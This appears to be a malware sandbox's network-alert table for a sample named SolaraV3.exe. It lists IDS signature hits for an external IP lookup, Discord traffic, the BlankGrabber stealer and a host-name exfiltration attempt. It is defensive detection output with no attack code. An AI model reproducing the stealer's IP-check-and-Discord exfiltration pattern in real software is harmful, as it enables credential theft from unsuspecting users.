2256 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
2256 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
2268 | SolaraV3.exe | A Network Trojan was detected | STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check |
2268 | SolaraV3.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
— | — | Successful Credential Theft Detected | SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt |
No debug info